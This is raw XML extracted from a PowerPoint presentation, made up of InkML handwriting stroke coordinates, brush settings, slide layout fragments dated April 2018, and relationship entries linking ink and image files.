39 187,0 0-188,0 0-15,0 0 16,0 0 0,0 0 15,0 0-31,0 0 15,-1 0 1,1 0 0,0 0-1,0 0-15,0 0 16,0 0 0,0 0 15,0 0-16,0 0-15,0 0 47,0 0-31,0 0 15,0 0-15,-1 0 31,1 0-16,0 0 0,0 0-15,0 0 78,0 0-48,0 0 48,0 0-63,39 39 48,-39-39-64,39 39 16,0 0 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9:25.174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195 787 0,'0'-39'31,"0"0"0,0 0-15,0 0 15,0 0 16,0 0-47,0 0 15,0 0 1,0 0 31,0 0-47,0 0 31,0 0-15,0-1 15,0 1-15,0 0 15,0 0 16,0 0 15,39 39-62,0 0 16,-39-39-16,39 39 16,1 0-1,-1-39 1,0 39-1,0-39 17,0 39-32,0 0 31,0 0 0,0 0-15,0 0-1,0 0-15,0 0 32,0 0-17,0 0 48,1 0-1,-40 39-46,0 0 0,0 0-1,0 0 1,0 0-1,0 0-15,0 40 16,0-1 0,0 0-1,0-39 1,0 0 15,0 0-15,0 0-1,0 0 1,0 0 0,-40 0-1,40 0 1,0 1 0,0-1 15,-39 0-31,39 0 15,0 0 1,0 0 0,-39-39-16,39 39 15,0 0 1,0 0-16,0 0 31,0 0-31,0 0 16,0 0-1,-39 1 1,39-1 0,0 0 15,-39-39-31,39 39 31,-39-39 32,0 0-48,-39 0 17,39 0-17,0 0-15,0 0 31,0 0-15,-1 0 0,1 0-16,39-39 31,0 0-31,-39 0 16,0 39-1,39-40 1,-39 1-1,39 0-15,-39 39 16,39-39-16,0 0 31,0 0 1,-39 0-32,39 0 31,0 0 0,0 0 0,0 0-31,-39 0 47,39 0-31,0-1-1,0 1 1,0 0 0,0 0 15,0 0-31,0-39 16,0 39-1,0 0 1,0 0-16,0 0 15,0 0 32,0 0-15,0-1-1,0 1 16,0 0 46,0 0-14,0 0-48,-39 39-31,39-39 78,39 0 172,0 39-234,0 0-16,0 0 15,0-39 1,0 39-1,0 0 1,0 0 15,1 0-15,-1 0 0,0 0 15,0 0 0,0 0 0,0 0-15,0 0 0,0 0 30,0 0-30,0 0 0,0 0-1,0 0 32,0 0-31,1 0 15,-1 0 0,-39 39 219,0 0-250,0 0 16,-39 39 0,-1 0-16,1 1 15,0-1 1,39-39-16,0 0 15,-39 0 1,0 0-16,39 0 16,-39-39-16,39 39 15,-39-39 1,39 39 15,0 0 0,-39-39 1,39 39-17,-39-39 17,39 40-17,-39-40 32,0 0 16,39-40-17,0-38-30,0 39 0,0 0-1,0 0 1,0 0-16,0 0 31,0 0-31,39 0 16,-39 0-1,39 39-15,0 0 16,-39-39-16,0 0 16,39-1-1,-39 1 1,39 39 0,0 0 15,0-39 63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9:31.793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92 239 0,'39'0'78,"0"0"-62,39-39-1,1 39-15,38-39 16,-39 39-1,-39 0-15,39-39 16,0 39-16,-39 0 16,1 0-1,-1 0-15,0 0 32,0 0-1,0 0 0,0 0-15,0 0 62,0 0-31,0 0-16,0 39 0,-39 0-31,0 0 16,0 39-1,0-39 1,0 0 15,0 1 1,0-1-17,0 0 1,0 0-1,0 0 1,0 39-16,0-39 16,0 0-1,0 0 1,0 0-16,0 0 16,0 0-1,0 1 1,0-1-1,0 0 1,0 0 15,0 0-15,-39-39 0,39 39-16,-39 0 31,39 0-16,-39-39 1,39 39-16,0 0 31,-39-39 1,0 39-1,0-39-16,39 39-15,-39 0 16,-39 1 0,38-40-1,40 39 1,-39-39-16,0 0 16,0 0 15,0 0-16,0 0-15,0 0 32,0 0-17,-39 0-15,39-39 16,0-1 0,39 1-16,-39 0 15,-1 0 1,-38-39-16,39 0 15,0 0 1,0 39-16,0-39 16,39-1-1,0 1 1,0 0 0,0 39-16,0 0 15,0-39-15,0 39 16,0-39-1,0 38-15,0-38 16,0 0 0,0 39-16,39 0 15,0 0 1,39 39 0,-78-39-1,0 0-15,39 39 16,0-39-1,1 39-15,-1 0 16,0 0 31,0 0-31,0 0 15,0 0-16,0 0 1,-39 117 0,39-78-1,0 0-15,-39 39 16,0-39-16,0 0 16,0 0-1,0 1 1,0-1-1,0 0-15,0 0 32,0 0-17,0 0 1,-39 0 0,0-39-1,39 39 1,-39-39-16,39 39 31,-39-39-15,39-39 77,0-39-93,0 39 16,39 0 0,0-39-16,0 78 31,0 0-15,-39-39-1,0 78 63,0 39-62,0-39 0,0 39-16,-39-78 15,0 39 1,39 0-16,-39 0 15,0-39 1,0 0-16,0 39 16,0-39-1,0 0 17,39-39 93,0 0-110,0 0-15,39 39 31,-39-39-31,39 39 16,0 0 0,39 0-1,-39 0 17,0 0-1,-78 0 78,-39 0-109,0 0 16,39 0-1,0 0 1,-1 0 0,1-39-1,39 0 1,0 0 0,0 0-1,0 0 1,0 0-16,39-40 31,1 1-31,-1 39 16,0-39-1,0 39-15,39 39 16,-39-39 0,-39 0-16,39 39 15,0 0 1,0 0-1,0 0 1,0 0-16,0 0 16,1 0-1,-1 39 1,0 39 0,0-78-1,-39 78-15,0-39 16,0 0-1,0 0-15,0 0 16,0 40 0,0-40-16,0 0 15,0 0 1,0 39-16,-39-39 16,0 39-16,0 0 15,-1-39 1,-38 1-16,39-1 15,39 0 1,-39 0-16,0-39 16,0 39-1,0-39-15,0 0 63,39-117-48,39 38 1,39-38 0,-39 39-16,0 0 15,0 39 1,0 39 0,0 0-1,1-39-15,-1 39 16,0 0-1,0 0 1,0 0 0,-39 39-1,39 0 1,-39 0 0,0 0-16,0 0 15,0 0 1,0 0-16,0 0 15,-39-39 1,-39 0-16,39 39 16,-40-39-1,40 0 1,0 0 0,0 0-16,0 0 15,39-39 16,0 0-31,-39 39 16,39-39 0,0 0-1,0 0 32,39 39 0,0 0-16,0 0-15,0 0 0,-39 39-1,0 0 1,0 0-1,0 39 1,0 1 0,0-1-16,0-39 15,-39-39 1,39 39-16,-39 0 16,0-39 30,39-39 33,39 39-17,0 0-46,0 0-1,0 0-15,1 0 32,-40 78-32,39 0 15,-39 0 1,0-39-1,0 1 1,0-1 0,0-78 124,0-1-124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9:46.447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0 26 0,'39'0'187,"0"0"-155,0 0-1,0 0-31,0 0 31,0 0 32,0 0-48,0 0 16,0 0 32,0 0-32,0 0-15,1 0 15,-1 0 0,0 0-15,0 0 0,0 0-1,0 0 32,0 0-31,0 0-1,0 0 1,0 0 15,0 0 0,0 0-15,0 0 0,1 0 31,-1 0 15,0 0 1,0 0-17,0 0 17,0 0-32,0 0 0,0 0-15,0 0 47,0 0-17,-39 39 533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9:47.721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0 0 0,'39'0'125,"39"0"-109,1 0-16,-1 0 31,0 0-31,-39 0 16,0 0-1,0 0-15,0 0 16,0 0 0,0 0 46,0 0-31,1 0 1,-1 0-1,0 0 31,0 0-15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9:50.167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0 0 0,'39'0'109,"39"0"-109,-39 0 16,0 0-1,39 0-15,-39 0 16,40 0 0,-40 0-1,39 0 1,0 0-1,-39 0 17,0 0-1,0 0-31,0 0 31,0 0-15,-39 39-1,39-39-15,1 0 16,-1 0 0,0 0 46,0 0-46,0 0 15,0 0 0,0 0 32,0 0-16,0 0-16,0 0 31,0 0 48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9:57.292"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.21167" units="cm"/>
      <inkml:brushProperty name="height" value="0.21167" units="cm"/>
      <inkml:brushProperty name="color" value="#808080"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 39 0,'0'78'109,"0"1"-93,0-40-16,0 39 15,0 0 1,0-39-16,0 39 15,0-39 1,0 39 0,0-39-16,0 1 31,0-1-31,0 0 31,0 0-31,0 0 78,39-39 110,-39-39-173,0-39-15,39-1 16,-39 1 0,0 0-16,0 39 15,0 0 1,39 0-16,-39 0 16,0 0-1,0 0 1,0 0-1,0 0-15,0-1 16,0 1 15,0 0 1,0 78 202,0 0-234,39 118 16,1-40-16,-40 0 15,39-78 1,-39 39-16,0-38 15,39-1 1,-39 0 0,39-39-1,-39-118 110,39 40-109,-39-78-16,39 39 16,-39 39-1,39-1-15,-39 40 16,0 0-1,0 0 1,0 0 0,0 78 156,0 0-157,0 39 1,0-38-1,39-40 79,0 0-47,-39 78 141,0 39-173,0 0-15,0 0 16,0-38-1,-39-1-15,39-39 16,-39 0 0,39 0 15,-39-39 31,0-39-30,0 0-17,0 0-15,0-39 16,0-1 0,39 40-16,-40 0 15,40 0 1,0 0-1,0 0-15,0 0 32,0 0 15,0 0-16,0 0 16,0 0 0,40 0-16,-1 39-16,0 0 1,0 0-16,39-40 16,0 1-1,0 39-15,0-39 16,-39 39 0,1 0-16,-1 0 15,0 0 16,-117 0 94,38 0-109,1 0-16,-78 0 16,39 0-1,39 0-15,-39 0 16,0 0 0,39 0-16,-1 0 15,1 0 32,0 0-16,39-39 47,39 39-46,0-39-17,40 39 1,-1 0 0,-39 0-16,0 0 31,0 0-31,0 0 15,0 0 1,0 0 15,0 0 1,0 0-32,0 0 31,1 0 16,-1 0-32,0 0 17,0 0-17,0 0 32,0 0-16,0 0 16,0 0 31,-39 39 63,0 0-110,0 0-15,0 0-1,0 1-15,0-1 16,0 0 0,0 0-16,-39 0 15,39 0-15,-39-39 16,39 39 0,0 0-16,-39 0 15,39 0 1,0 0 15,0 0-15,-39 0-1,39 1 1,-39-40 0,0 39-1,39 0 1,-39 0-1,39 0-15,-40 0 63,40 0-32,0-78 360,0 0-376,0 0 1,0 0-16,0 0 16,0 0 31,40 39-47,-40-40 46,39 1-14,-39 0-17,0 0 17,0 0 14,0 0-30,0 0 0,0 0 15,0 0-15,0 0-16,-39 39 15,39-39 1,-40 39 15,40-39-31,0 0 47,0-1-16,40 40 79,-1 0-95,0 0 1,0 0-1,0 0 1,0 0 0,0 0-1,0 0-15,0 0 78,0 0-31,0 0 0,-39 79-16,0-1-31,0-39 16,0 39 0,0 39-16,0-39 15,0 1 1,-78-1-16,39 0 16,0-39-1,0 0-15,0 0 16,39 0-1,0 0-15,0 0 16,-39-39 0,0 0 15,39 39-15,-39-39 77,0 0-15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2:04.766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110 128 0,'39'0'266,"0"0"-250,0 0 15,0 0-15,0 0-1,0 0 32,0 0-31,0 0 15,0 0-31,0 0 31,0 0-15,0 0-16,1 0 31,-1 0-15,0 0-1,0 0 1,0 0 0,0 0 15,0 0-16,0 0-15,0 0 32,0 0-1,0 0 0,0 0-15,0 0-1,-39-39 564,-39 39-189,0 0-343,0 0-31,0 0-1,0 0 32,0 0-31,0 0-16,0 0 31,0 0-15,0 0-1,0 0 1,0 0 15,-1 0-15,1 0-1,0 0 17,0 0-1,0 0-15,0 0 15,0 0 0,0 0 32,0 0-48,0 0 1,0 0-1,0 0 17,0 0-1,-1 0 0,1 0 0,78 0 454,1 0-470,-1 0 1,-39-39-16,39 39 16,0 0-1,0 0 1,0 0-16,0 0 31,0 0-31,0 0 16,0 0-1,0 0 1,0 0 0,0 0-1,1 0 1,-1 0 31,0 0 15,0 0-15,0 0-31,0 0 15,0-39-15,0 39-1,0 0 17,0 0-17,0 0 16,0 0-15,0 0 31,1 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4:02.134"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.175" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#929292"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 0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3:14.294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0 165 0,'39'0'140,"40"0"-124,-40 0-1,0 0-15,0 0 16,0 0-16,0 0 31,0 0-31,0 0 16,0 0 31,0 0-47,0 0 15,0 0 1,1 0 0,-1 0-16,0 0 31,0 0-31,0 0 31,0 0-31,0 0 31,0 0-31,0 0 32,0 0-17,0 0 1,0 0 15,0 0 0,1 0-15,-1 0 15,0 0 1,0 0 14,0 0-14,-78 0 171,0 0-203,0 0 15,0 0 1,-1-39-16,1 39 16,0 0-1,0 0 17,0 0-32,0 0 15,0 0 16,0 0 1,0 0-1,0 0-15,39-39-1,-39 39 16,0 0-15,39-39-16,-39 39 16,-1 0-1,1 0 17,0 0-1,0 0 0,0 0 0,39-39 16,-39 39-31,0 0-1,0 0 32,0 0 31,0 0 79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7:04:35.417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0,'37'0'219,"-1"0"-219,1 0 15,0 0 17,0 0-1,0 0-16,-1 0 1,1 0 0,0 0-1,0 0 1,0 0 15,0 0 0,-1 0-15,1 0 0,0 0 15,0 0 0,0 0-31,-1 0 16,1 0-1,0 0 17,0 0-17,0 0-15,-1 0 16,1 0 15,0 0 0,0 0-15,0 0 0,-1 0 31,1 0-1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5:13.349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0,'39'0'250,"0"0"-250,0 0 16,0 0-1,0 0-15,40 0 16,-40 0-1,0 0 1,0 0 0,0 0 15,0 0 47,0 0-62,0 0-16,0 0 15,0 0 1,0 0 0,0 0-1,0 0-15,1 0 16,-1 0-1,0 0-15,0 0 16,0 0 0,0 0-16,0 0 31,0 0-31,0 0 16,-39 40-16,39-40 15,0 0 1,0 0-1,0 0 1,1 0 15,-1 0-31,0 0 32,0 0-32,0 0 31,0 0-16,0 0 17,0 0-32,0 0 31,0 0-15,0 0-1,0 0 1,0 0 15,1 0-31,-1 0 16,0 0-1,0 0 32,0 0-31,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-16,0 0 47,0 0 0,1 0-16,-1 0 78,0 0-46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5:16.633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0,'39'0'235,"0"0"-220,0 0 1,0 0 15,1 0-31,-1 0 16,0 0 15,0 0-15,0 0-1,0 0 1,0 0 0,0 0 15,0 0-31,0 0 15,0 0 17,0 0-17,0 0 1,1 0 15,-1 0-31,0 0 16,0 0-1,0 0 17,0 0-32,0 0 15,0 0-15,0 0 32,0 0-32,0 0 15,0 0 1,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 17,0 0-17,0 0 1,0 0 15,0 0 0,0 0-15,0 0-16,0 0 31,0 0-15,0 0-1,1 0-15,-1 0 32,0 0-17,0 0-15,0 0 16,0 0 0,0 0 15,0 0-31,0 0 31,0 0-31,0 0 31,0 0-15,0 0 0,1 0-1,-1 0 32,0 0-31,0 0 46,0 0-15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5:22.815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0,'39'0'141,"39"0"-141,-39 0 15,0 0 1,0 0 0,0 0-1,1 0-15,-1 0 16,0 0 0,0 0-16,0 0 15,0 0 1,0 0-16,0 0 15,0 0-15,0 0 16,0 0 0,39 0-1,-38 0 1,-1 0 0,0 0-1,0 0 16,0 0 1,0 0-1,0 0 16,0 0-16,0 0 0,0 0 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5:30.687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0,'78'0'141,"-39"0"-141,39 0 15,39 0 1,-38 0-16,-1 0 16,0 0-1,-39 0-15,0 0 16,39 0 0,-39 0-16,0 0 15,0 0 1,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0-16,0 0 31,0 0-15,0 0-1,0 0 1,0 0 15,0 0-15,0 0 0,0 0-16,1 0 31,-1 0-16,0 0 1,0 0 0,0 0-1,0 0 17,0 0-32,0 0 15,0 0 16,0 0 1,0 0-1,0 0 31,0 0-30,1 0-1,-1 0-15,0 0 15,0 0 16,0 0-32,0 0 1,0 0 15,0 0 0,0 0 1,0 0-1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5:33.375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0,'79'0'94,"-1"0"-78,-39 0-1,39 0-15,-39 0 16,39 0-1,-39 0-15,39 0 16,1 0 0,-40 0-1,0 0 1,0 0-16,0 0 16,0 0-16,0 0 15,0 0 1,0 0-1,0 0 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-16,0 0 15,0 0 1,0 0-1,0 0-15,0 0 16,0 0 0,0 0-16,39 0 15,-39 0 1,1 0 15,-1 0 0,0 0-15,0 0 0,0 0 31,0 0-16,0 0-16,0 0 1,0 0 15,0 0-15,0 0 15,0 0 235,0 0-251,1 0 1,-1 0 0,0 0 15,0 0 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7:04:45.371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63 0,'37'0'141,"0"0"-126,0 0 1,36-37 0,-36 37-16,37 0 15,-1 0 1,-36 0-1,0 0 1,0 0-16,0 0 31,-1 0-31,1 0 16,0 0 0,0 0 15,0 0-31,-1 0 15,1 0 1,0 0 15,0 0-15,0 0 15,-1 0 16,1 0 47,0 0-32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5:43.339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79 0,'39'0'141,"0"0"-126,39 0-15,-39 0 16,78 0-1,-39 0-15,1 0 16,-1 0 0,-39 0-16,39 0 15,0 0 1,-39 0-16,39 0 16,1 0-1,-40 0 1,0 0-1,39 0 1,-39 0-16,0 0 16,0 0-1,0 0-15,0-39 16,0 39 0,0 0-16,0 0 31,1 0-31,-1 0 15,0 0 1,0 0 0,0 0-16,0 0 15,0 0 1,0 0 0,0 0-1,0 0-15,0 0 16,0 0 15,0 0-15,1 0-1,-1 0 1,0 0 15,0 0-15,0 0 15,0 0-31,0 0 31,0 0-15,0 0 0,0 0 46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5:47.227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0 196 0,'39'0'78,"0"0"-31,1 0-15,-1 0-32,0 0 15,0 0 1,0 0-1,0 0 1,0 0-16,0 0 16,0 0-1,39 0-15,-39 0 16,0 0-16,1 0 16,-1 0-1,0 0 1,0 0-1,0 0 17,0 0-32,0 0 15,0 0 17,0 0-17,0 0 1,0 0 15,0 0 0,0 0 16,1 0 0,-40-39 406,0 0-406,0 0 16,0 0-32,0 0 16,-40 39 62,1 0-78,0 0 1,0 0-17,0 0 16,0 0-15,0 0 15,0 0-15,0 0 0,0 0 15,0 0-16,0 39 1,0-39 0,39 39 15,-40-39-15,1 0-1,0 0 16,0 0-15,0 0 15,0 0 1,0 0-17,39 39 1,-39-39-16,0 0 31,0 0 0,0 0-31,0 0 47,0 0 125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4:02.326"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.175" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#929292"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 0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5:51.592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0,'79'0'125,"-1"0"-110,-39 0 1,0 0-16,0 0 16,39 0-1,0 0-15,0 0 31,-38 0-31,38 0 16,-39 0 0,0 0-1,0 0 1,0 0-16,0 0 16,39 0-16,-39 0 15,0 0 1,0 0-1,1 0 1,-1 0-16,0 0 16,0 0-1,0 0 1,0 0 0,0 0-16,0 0 31,0 0-16,0 0-15,0 0 16,0 0 0,0 0-1,1 0 1,-1 0-16,0 0 31,39 0-31,-39 0 16,0 0-1,39 0 17,-39 0-32,0 0 31,0 0-15,0 0-1,1 0 1,-1 0 31,0 0-32,0 0 1,0 0 15,0 0 0,0 0 1,0 0 30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5:54.543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0,'79'0'93,"-40"0"-77,78 0 0,0 0-16,0 0 15,-38 0-15,38 0 16,-78 0-1,0 0-15,0 0 16,0 0 0,0 0-16,0 0 31,0 0-31,39 0 297,-38 0-282,38 0-15,-39 0 16,78 0 0,-39 0-16,0 0 15,0 0 1,-38 0-16,-1 0 16,39 0-1,0 0-15,0 0 16,-39 0-16,0 0 15,39 0 1,1 0-16,-40 0 16,0 0-1,39 0-15,-39 0 16,0 0 0,0 0-16,0 0 15,39 0 1,-39 0-16,0 0 15,1 0 1,-1 0 0,0 0-1,0 0-15,0 0 16,0 0 15,0 0-31,0 0 16,0 0-1,0 0 17,0 0-17,0 0 17,0 0 30,1 0-15,-1 0 15,0 0-15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6:04.919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0,'39'0'141,"1"0"-126,38 0 1,39 0-16,0 0 15,-78 0 1,39 0-16,1 0 16,-40 0-1,0 0-15,39 0 16,-39 0-16,39 0 16,0 0-1,-39 0 1,39 0-1,-38 0-15,-1 0 16,0 0 0,39 0-16,-39 0 15,0 0 17,0 0-1,0 0 281,0 0-312,0 0 32,39 0-32,-38 0 15,-1 0 1,0 0-16,39 0 15,-39 0 1,0 0-16,0 0 16,0 0-1,39 0-15,-39 0 16,0 0 0,1 0-1,-1 0-15,0 0 31,0 0-15,0 0 0,0 0-1,0 0 32,0 0 0,0 0-31,0 0-1,0 0 48,0 0-1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56:08.850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94 0,'39'0'125,"0"0"-109,39 0-1,1 0-15,-40 0 16,39 0 0,0 0-16,-39 0 15,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-16,0 0 16,0 0-1,39 0 17,-39 0-17,0 0 1,0 0-1,0 0 1,0 0 0,0 0 15,0 0 313,1 0-344,38 0 15,0 0 1,0 0 0,0 0-1,0 0 1,-39 0-1,40 0-15,-40 0 16,0 0 0,0 0-16,39 0 15,0 0-15,-39 0 32,39 0-32,-39 0 15,0 0 1,1 0 15,-1 0-31,0 0 31,0 0 16,0 0-31,0 0 31,0 0-32,0 0 32,0 0-47,0 0 16,0 0-1,0 0 1,0 0 0,1 0-1,-1 0 1,0 0 15,0 0-15,0 0-1,0 0 1,0 0 62,0 0-31,0 0 31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4688">4220 94 0,'40'0'156,"-1"0"-156,39 0 16,-39 0-1,0 0 1,0 0 0,0 0-16,0 0 31,0 0 328,0 0-343,0 0-16,0-39 15,79 39-15,-1 0 16,0 0 0,0 0-16,1 0 15,-1 0 1,0 0-16,-39 0 16,-39 0-1,0 0-15,0 0 16,1 0-1,-1 0 376,0 0-391,0 0 16,39 0-1,-39 0 1,39 0 0,0 0-1,-39 0 1,40 0-16,-1 0 31,-39 0-31,0 0 16,0 0-1,0 0-15,39 0 16,-39 0-16,0 0 31,0 0-31,0 0 16,1 0-1,-1 0 48,0 0 171,39 0-218,0 0 0,-39 0-1,39 0-15,39 0 31,-38 39-31,-40-39 16,78 0 0,-78 39-1,39-39 1,-39 0 0,0 0-1,0 0 1,0 0-1,1 0 1,-1 0 15,0 0-15,0 0 46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4:03.549"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.175" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#929292"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 0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4:03.740"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.175" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#929292"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 0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4:46.721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0,'39'0'156,"0"0"-140,0 0-1,0 0 17,0 0-32,1 0 15,-1 0 1,0 0 0,0 0-1,0 0 1,0 0-1,0 0 17,0 0-17,0 0 1,0 0 0,0 0 77,0 0-61,0 0-17,1 0 48,-1 0-1,0 0-46,0 0 31,0 0-32,0 0 79,0 0-63,0 0 1,0 0 30,0 0 422,0 0-468,0 0 15,0 0-15,1 0 0,-1 0-1,0 0 1,0 0 31,0 0-47,0 0 47,0 0-1,0 0 64,0 0-63,0 0 15,0 0-15,0 0 31,0 0-47,1 0-15,-1 0 15,0 0 47,0 0-62,0 0 15,0 0 1,0 0 14,0 0-14,0 0-1,0 0 0,0 0 79,0 0-48,0 0-15,1 0 0,-1 0 93,0 0-61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4:51.998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0,'39'0'203,"0"0"-171,0 0-32,0 0 31,1 0-31,-1 0 15,0 0 1,0 0 15,0 0-15,0 0 453,0 0-438,0 0 0,0 0-15,0 0 15,0 0-15,0 0 31,0 0-32,1 0 32,-1 0-31,0 0 93,0 0 266,0 0-344,0 0-31,0 0 32,0 0-17,0 0 1,0 0-1,0 0 17,0 0-17,0 0 1,1 0 0,-1 0 46,0 0 1,0 0-32,0 0 0,0 0 63,0 0-63,0 0 0,0 0-15,0 0 15,0 0 0,0 0-15,0 0 0,1 0 31,-1 0-16,0 0-16,0 0 32,0 0-47,0 0 16,0 0 0,0 0 30,0 0 1,0 0 16,0 0-16,0 0 93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8-04-14T06:47:49.699"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.15875" units="cm"/>
      <inkml:brushProperty name="height" value="0.15875" units="cm"/>
      <inkml:brushProperty name="color" value="#808080"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 0,'40'0'172,"-1"0"-156,39 0 0,0 0-16,39 0 15,-39 0 1,0 0-16,-38 0 31,-1 0 0,0 0-15,0 0 390,0 0-375,0 0-31,0 0 16,0 0 0,0 0 15,0 0-15,0 0 15,0 0-16,0 0 32,1 0-15,-1 0 14,0 0-30,0 0 31,0 0-31,0 0-1,0 0 1,0 0 15,0 0-15,0 0-1,0 0 1,0 0 46,0 0-46,1 0 15,-1 0 1,0 0-32,0 0 15,0 0 1,0 0-1,0 0 17,0 0-32,0 0 15,0 0 32,0 0-31,0 0-1,0 0 1,1 0 47,-1 0-48,0 0 1,0 0 31,0 0 46,0 0-46,0 0 16,0 0-32,0 0 32,0 0-17,0 0 17,0 0-1</inkml:trace>
</inkml:ink>
</file>

<file path=ppt/media/image1.png>
</file>

<file path=ppt/media/image14.png>
</file>

<file path=ppt/media/image15.png>
</file>

<file path=ppt/media/image16.png>
</file>

<file path=ppt/media/image2.png>
</file>

<file path=ppt/media/image30.png>
</file>

<file path=ppt/media/image31.png>
</file>

<file path=ppt/media/image3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CF6D1E-3C8D-4917-BE0E-512A8CBFBE38}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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C5C6B-3CDA-41FA-BD55-5A736EEBCFD4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4234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24893-DBDA-4BFA-9CE1-4BFE7CD0F8CF}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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F84E2-2D7A-43CF-AC90-352A289A783A}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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8800"/>
            <a:ext cx="5181600" cy="435133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1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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1681851"/>
            <a:ext cx="5156200" cy="731520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1248" y="2507550"/>
            <a:ext cx="5156200" cy="372825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5064" y="1681851"/>
            <a:ext cx="5157787" cy="73152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5064" y="2507550"/>
            <a:ext cx="5157787" cy="372825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1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr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1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr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1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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039484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1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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041136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74940-A916-4C8B-9648-02A2D3898F9E}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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86B75A-687E-405C-8A0B-8D00578BA2C3}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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customXml" Target="../ink/ink32.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink34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4.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink35.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink37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8.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink43.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink40.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.em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1.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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5.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink10.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink14.xml"/><Relationship Id="rId3" 